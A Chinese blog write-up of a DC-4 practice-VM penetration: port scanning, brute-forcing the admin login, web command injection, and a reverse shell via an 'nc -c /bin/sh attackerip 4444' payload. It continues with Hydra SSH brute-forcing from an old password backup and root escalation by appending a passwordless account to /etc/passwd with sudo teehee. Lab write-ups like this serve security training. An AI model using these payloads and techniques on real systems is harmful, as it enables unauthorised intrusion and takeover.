DC-4靶机渗透

DC-4靶机渗透

直接vm打开靶机,NAT模式,nmap 扫描局域网存活的主机
在这里插入图片描述
发现142,直接上个全扫描
在这里插入图片描述发现了开放了22 和80端口,分别对应的ssh和http服务
linux操作系统
浏览器打开网站
在这里插入图片描述
发现admin后台登录,这里直接用admin账号,不要问我咋知道的,直觉!
bp爆破admin的口令
在这里插入图片描述拿到口令登录:
在这里插入图片描述
命令执行,拦截包,重放,发现没有任何过滤机制
在这里插入图片描述
这里只是命令中的空格被+号代替,发现除了root用户之外,还有三个用户账户
在这里插入图片描述
这里执行直接反弹shell
kali监听4444端口
payload:nc±c+/bin/sh+attackerip+4444
成功反弹
在这里插入图片描述
拿到shell,一波常规操作
在这里插入图片描述
发现是网站用户,没有什么权限可利用,所有还是得用其他用户权限,我直接横向到其他用户家目录里,看有什么可利用的没
在这里插入图片描述发现了jim用户家目录中有个backups
看看
在这里插入图片描述
有个备份文件,可以根据老口令,来生成一个爆破字典
直接九头蛇怼上去
在这里插入图片描述
拿到口令了,理论上来说,没有穷举攻击拿不下的系统。
ssh连接:
在这里插入图片描述尝试了一波sudo+git的提权,没有成功
在这里插入图片描述
然后看了一下mbox文件内容
在这里插入图片描述
这是一封邮件简介的文件,也提醒我们去查找邮件在这里插入图片描述
在这里插入图片描述
拿到charles用户账号的口令
切换用户
在这里插入图片描述
看看有那些是root权限运行的二进制文件,这里可以用sudo

在这里插入图片描述利用teehee创建空口令账号并加入到管理员组,这里用了一个linux系统的bug,如果账户口令为空就会以passwd这个文件为主要的依据

在这里插入图片描述切换admin账号:
在这里插入图片描述
拿到flag!

总结:
先是admin账号爆破,进入后台,发现了命令执行,通过命令执行发现三个账户,直接反弹shell到本地,用网站用户找到其他用户的家目录,拿到了其中一个用户的oldpasswd备份文件,九头蛇爆破,成功ssh到该用户,尝试提权无果,随发现另一个账号密码的邮件,横向到另一个用户,扫描root权限执行的二进制文件,teehee创建一个空口令用户并加入到管理员组,切换用户,然后成功提权到root用户!

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0XAXSDD

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值